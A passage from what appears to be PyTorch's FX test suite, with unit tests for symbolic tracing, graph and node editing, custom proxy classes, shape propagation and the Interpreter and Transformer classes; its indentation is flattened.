return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
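# NOTE: with ProxyableClassMeta, constructing ZeroTensor(x + y) under tracing does
# not run __init__ on a Proxy; the construction itself is recorded as a
# `call_function` node targeting the class, so the data-dependent branch on
# `inp.sum() == 0` only executes later, when the traced module runs on real tensors.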
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_remove_uses_with_custom_filter(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu, lambda x: x != neg)
self.assertTrue(neg in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
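# NOTE: ShapeProp runs the GraphModule on the example input and stores a
# TensorMetadata record (shape, dtype, stride, memory_format, ...) in
# node.meta['tensor_meta'] for each executed node; that is what the layout
# assertions in these shape-propagation tests inspect.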
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
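# NOTE: Interpreter executes the graph node by node; the call_function/call_method
# overrides receive the resolved target plus already-evaluated args/kwargs, so
# returning torch.neg(*args, **kwargs) swaps the op at execution time without
# rewriting the underlying graph (contrast with the Transformer variant further down).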
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
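# NOTE: `initial_env` maps Node -> value; a node already present in the env is
# treated as computed and is not re-executed, so seeding the `linear` node above
# makes the run return clamp(seeded_value, 0, 1) regardless of the layer's weights.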
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_interpreter_default_args(self):
class Model(torch.nn.Module):
def forward(self, x, y=3.14159):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
out = interp.run(x)
torch.testing.assert_allclose(out, x + 3.14159)
def test_interpreter_not_enough_args(self):
class Model(torch.nn.Module):
def forward(self, x, y):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
with self.assertRaisesRegex(RuntimeError,
'Expected positional argument for parameter y, but one was not passed in'):
out = interp.run(x)
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
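# NOTE: unlike the Interpreter version above, Transformer feeds Proxy values through
# the overridden call_function/call_method hooks and records whatever they return
# into a fresh graph, so .transform() yields a rewritten GraphModule rather than an
# eagerly computed result.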
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# torch.neg has no in-place variant, so drop 'inplace' from the copied kwargs
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
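# NOTE: Node.replace_input_with(old, new) rewrites only this node's own use of `old`,
# whereas Node.replace_all_uses_with (exercised in test_remove_uses above) repoints
# every user of a node; here only the relu node switches its input from x to y.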
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_immutable_list_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
l = immutable_list([3, [rand_tensor, 42]])
flattened, spec = pytree.tree_flatten(l)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == l
assert isinstance(unflattened, immutable_list)
def test_immutable_dict_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
d = immutable_dict({'a': 3, 'b': [rand_tensor, 42]})
flattened, spec = pytree.tree_flatten(d)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == d
assert isinstance(unflattened, immutable_dict)
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_prepend_self(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.prepend(b)
x.append(b)
self.assertEqual(len(graph.nodes), 3)
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
